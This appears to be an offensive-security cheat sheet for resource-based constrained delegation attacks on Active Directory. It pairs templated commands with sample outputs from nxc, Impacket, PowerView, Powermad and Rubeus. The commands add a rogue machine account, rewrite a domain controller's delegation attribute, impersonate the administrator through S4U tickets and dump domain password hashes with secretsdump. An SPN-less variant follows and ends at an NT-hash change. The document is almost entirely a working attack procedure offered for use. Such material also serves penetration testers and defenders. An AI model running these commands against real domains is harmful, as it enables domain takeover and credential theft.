Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Authentication Method
RBCD Attack
1. Check Machine Quota [Optional]
# Password
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -M maq
Sample Output:
$ nxc ldap DC01.example.com -u 'apple.seed' -p 'Password123!' -d example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:Password123!
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# NTLM
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -d <DOMAIN> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -H '2B576ACBE6BCFDA7294D6BD18041B8FE' -d giveback.htb -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:2B576ACBE6BCFDA7294D6BD18041B8FE
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# Password-based Kerberos
nxc ldap <TARGET> -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -k --kdcHost <DC> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -p 'Password123!' -d giveback.htb -k --kdcHost dc01.example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:Password123!
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# NTLM-based Kerberos
nxc ldap <TARGET> -u '<USER>' -H '<HASH>' -d <DOMAIN> -k --kdcHost <DC> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -H '2B576ACBE6BCFDA7294D6BD18041B8FE' -d giveback.htb -k --kdcHost dc01.example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
LDAP 10.10.72.181 389 DC01 [+] example.com\apple.seed:2B576ACBE6BCFDA7294D6BD18041B8FE
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
# Ticket-based Kerberos
nxc ldap <TARGET> -u '<USER>' -d <DOMAIN> -k --use-kcache --kdcHost <DC> -M maq
Sample Output:
$ nxc ldap dc01.example.com -u 'apple.seed' -d giveback.htb -k --use-kcache --kdcHost dc01.example.com -M maq
LDAP 10.10.72.181 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:example.com)
MAQ 10.10.72.181 389 DC01 [*] Getting the MachineAccountQuota
MAQ 10.10.72.181 389 DC01 MachineAccountQuota: 10
2. Create a Fake Computer [Optional]
# Password
impacket-addcomputer '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed:Password123!' -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# NTLM
impacket-addcomputer '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# Password-based Kerberos
impacket-addcomputer '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed:Password123!' -k -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# NTLM-based Kerberos
impacket-addcomputer '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
# Ticket-based Kerberos
impacket-addcomputer '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -computer-name '<COMPUTER>' -computer-pass '<COMPUTER_PASSWORD>'
Sample Output:
$ impacket-addcomputer 'example.com/apple.seed' -k -computer-name 'EvilComputer' -computer-pass 'Password123!' -dc-ip 10.10.11.10
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Successfully added machine account EvilComputer$ with password Password123!.
3. Get Service Principle Name (SPN) [Optional]
# Password
impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web:Password123!' -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com svc_web 2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# NTLM
impacket-GetUserSPNs '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com svc_web 2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# Password-based Kerberos
impacket-GetUserSPNs '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web:Password123!' -k -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com svc_web 2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# NTLM-based Kerberos
impacket-GetUserSPNs '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com svc_web 2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
# Ticket-based Kerberos
impacket-GetUserSPNs '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -request
Sample Output:
$ impacket-GetUserSPNs 'example.com/svc_web' -k -dc-ip 10.10.11.10 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ --------------- -------- -------------------------- -------------------------- ----------
MSSQL/ms01.example.com svc_web 2023-06-07 17:48:26.340517 2025-08-06 08:14:20.426867
4. RBCD Attack [Control over an Account with SPN]
# Password
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# NTLM
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Password-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -k -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# NTLM-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Ticket-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -delegate-from '<COMPUTER>$' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -k -dc-ip 10.10.11.10 -delegate-from 'EvilComputer$' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] EvilComputer$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] EvilComputer$ (S-1-5-21-3542429192-2036945976-3483670807-11601)
Note: Delegate from an account with SPN, which may not be a computer.
Note: Remove trailing $ if not a machine account.
5. Impersonate
# Password
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>:<COMPUTER_PASSWORD>' -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer:Password123!' -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# NTLM
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>' -hashes :<HASH> -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# Password-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>:<COMPUTER_PASSWORD>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer:Password123!' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# NTLM-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>' -hashes :<HASH> -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
# Ticket-based Kerberos
sudo ntpdate -s <DC_IP> && impacket-getST '<DOMAIN>/<COMPUTER>' -k -dc-ip <DC_IP> -spn <SPN> -impersonate <TARGET_USER>
Sample Output:
$ sudo ntpdate -s 10.10.11.10 && impacket-getST 'example.com/EvilComputer' -k -dc-ip 10.10.11.10 -spn cifs/dc.example.com -impersonate administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.example.com@EXAMPLE.COM.ccache
6. Secrets Dump
# Pass-the-ticket
export KRB5CCNAME='<CCACHE>'
Sample Output:
$ export KRB5CCNAME='administrator@cifs_dc.example.com@EXAMPLE.COM.ccache'
# Ticket-based Kerberos
impacket-secretsdump <TARGET_USER>@<TARGET> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
1. Import Modules
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> . .\PowerView.ps1
. .\Powermad.ps1
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> . .\Powermad.ps1
Ref: Powermad.ps1
2. Check Machine Account Quota
Get-DomainObject -Identity 'DC=<EXAMPLE>,DC=<COM>' | select ms-ds-machineaccountquota
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> Get-DomainObject -Identity 'DC=EXAMPLE,DC=COM' | select ms-ds-machineaccountquota
ms-ds-machineaccountquota
-------------------------
10
3. Create New Computer Account
New-MachineAccount -MachineAccount <COMPUTER> -Password $(ConvertTo-SecureString '<COMPUTER_PASSWORD>' -AsPlainText -Force)
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> New-MachineAccount -MachineAccount EvilComputer -Password
$(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)
[+] Machine account EvilComputer added
4. RBCD Attack
$fakesid = Get-DomainComputer <COMPUTER> | select -expand objectsid
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $fakesid = Get-DomainComputer EvilComputer | select -expand objectsid
$fakesid
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $fakesid
S-1-5-21-3542429192-2036945976-3483670807-11601
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer <TARGET_COMPUTER> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
5. Check if SecurityIdentifier is Now fakesid
$RawBytes = Get-DomainComputer <TARGET_COMPUTER> -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor.DiscretionaryAcl
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> $Descriptor.DiscretionaryAcl
BinaryLength : 36
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-3542429192-2036945976-3483670807-11601
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
6. Impersonate
# Calculate NTLM
.\rubeus.exe hash /password:'<COMPUTER_PASSWORD>' /user:<COMPUTER> /domain:<DOMAIN>
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> .\rubeus.exe hash /password:'Password123!' /user:EvilComputer /domain:example.com
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Password123!
[*] Input username : EvilComputer
[*] Input domain : example.com
[*] Salt : EXAMPLE.COMEvilComputer
[*] rc4_hmac : B9E0CFCEAF6D077970306A2FD88A7C0A
[*] aes128_cts_hmac_sha1 : FE834E7490537D833B4FBB0C215BEDB3
[*] aes256_cts_hmac_sha1 : D105000C879775D1727D9E56EF0CA48FD2996B9370165832BB1C5A265922B359
[*] des_cbc_md5 : DAE66B133454FDB5
# Impersonate
.\rubeus.exe s4u /user:'<COMPUTER>$' /rc4:<HASH> /impersonateuser:administrator /msdsspn:<SPN> /ptt /nowrap
Sample Output:
*Evil-WinRM* PS C:\Users\apple.seed\Documents> .\rubeus.exe s4u /user:'EvilComputer$' /rc4:B9E0CFCEAF6D077970306A2FD88A7C0A /impersonateuser:administrator /msdsspn:cifs/dc.example.com /ptt /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: B9E0CFCEAF6D077970306A2FD88A7C0A
[*] Building AS-REQ (w/ preauth) for: 'example.com\EvilComputer$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFuDCCBb ---[SNIP]--- VyLmh0Yg==
[*] Action: S4U
[*] Building S4U2self request for: 'EvilComputer$@EXAMPLE.COM'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'EvilComputer$@EXAMPLE.COM'
[*] base64(ticket.kirbi):
doIGCjCCBg ---[SNIP]--- 1wdXRlciQ=
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.example.com'
[*] Building S4U2proxy request for service: 'cifs/dc.example.com'
[*] Using domain controller: DC.example.com (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.example.com':
doIGujCCBr ---[SNIP]--- VyLmh0Yg==
[+] Ticket successfully imported!
7. Convert to ccache Format
python3 rubeustoccache.py '<BASE64_TICKET>' <TARGET_USER>.kirbi <TARGET_USER>.ccache
Sample Output:
$ python3 rubeustoccache.py 'doIGujCCBr ---[SNIP]--- VyLmh0Yg==' secrets.kirbi secrets.ccache
╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐ ┌┬┐┌─┐ ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐ │ │ │ ║ │ ├─┤│ ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘ ┴ └─┘ ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
By Solomon Sklash
github.com/SolomonSklash
Inspired by Zer1t0's ticket_converter.py
[*] Writing decoded .kirbi file to secrets.kirbi
[*] Writing converted .ccache file to secrets.ccache
[*] All done! Don't forget to set your environment variable: export KRB5CCNAME=secrets.ccache
Ref: RubeusToCcache
8. Secrets Dump
# Pass-the-ticket
export KRB5CCNAME=<TARGET_USER>.ccache
Sample Output:
$ export KRB5CCNAME=secrets.ccache
# Ticket-based Kerberos
impacket-secretsdump <TARGET_USER>@<TARGET> -k -no-pass
Sample Output:
$ impacket-secretsdump administrator@dc.example.com -k -no-pass -just-dc-user Administrator
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7ddf32e17a6ac5ce04a8ecbf782ca509:::
---[SNIP]---
[*] Cleaning up...
SPN-Less RBCD Attack
1. RBCD
# Password
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-4029599044-1972224926-2225194048-1126)
# NTLM
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Password-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed:Password123!' -k -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
# NTLM-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -hashes :<HASH> -k -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -hashes :2B576ACBE6BCFDA7294D6BD18041B8FE -k -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
# Ticket-based Kerberos
impacket-rbcd '<DOMAIN>/<USER>' -k -dc-ip <DC_IP> -delegate-from '<USER>' -delegate-to '<TARGET_COMPUTER>$' -action 'write'
Sample Output:
$ impacket-rbcd 'example.com/apple.seed' -k -dc-ip 10.10.11.10 -delegate-from 'apple.seed' -delegate-to 'DC$' -action 'write'
Impacket v0.12.0.dev1+20240730.164349.ae8b81d7 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] apple.seed can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] apple.seed (S-1-5-21-3542429192-2036945976-3483670807-11601)
2. Generate NTLM Hash
iconv -f ASCII -t UTF-16LE <(printf '<PASSWORD>') | openssl dgst -md4
Sample Output:
$ iconv -f ASCII -t UTF-16LE <(printf 'Password123!') | openssl dgst -md4
MD4(stdin)= 2B576ACBE6BCFDA7294D6BD18041B8FE
3. Request a Ticket
# NTLM
impacket-getTGT '<DOMAIN>/<USER>@<TARGET>' -hashes ':<HASH>'
Sample Output:
$ impacket-getTGT 'example.com/apple.seed@DC.example.com' -hashes ':2B576ACBE6BCFDA7294D6BD18041B8FE'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in apple.seed@DC.example.com.ccache
4. Get Session Key
# Pass-the-ticket
export KRB5CCNAME='<CCACHE>'
Sample Output:
$ export KRB5CCNAME='apple.seed@DC.example.com.ccache'
# Get tickey session key
impacket-describeTicket '<CCACHE>' | grep 'Ticket Session Key'
Sample Output:
$ impacket-describeTicket apple.seed@DC.example.com.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key : 49e0cd8abe883d869f5af9ad8556fb29
5. Update Target User NT Hash
# Password
impacket-changepasswd '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -dc-ip <DC_IP> -newhashes :<SESSION_KEY>
Sample Output:
$ impacket-changepasswd 'example.com/apple.seed:Password123!@dc.example.com' -dc-ip 10.10.11.10 -newhashes :49e0cd8abe883d869f5af9ad8556fb29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of example.com\apple.seed
[*] Connecting to DCE/RPC as example.com\apple.seed
[*] Password was changed successfully.
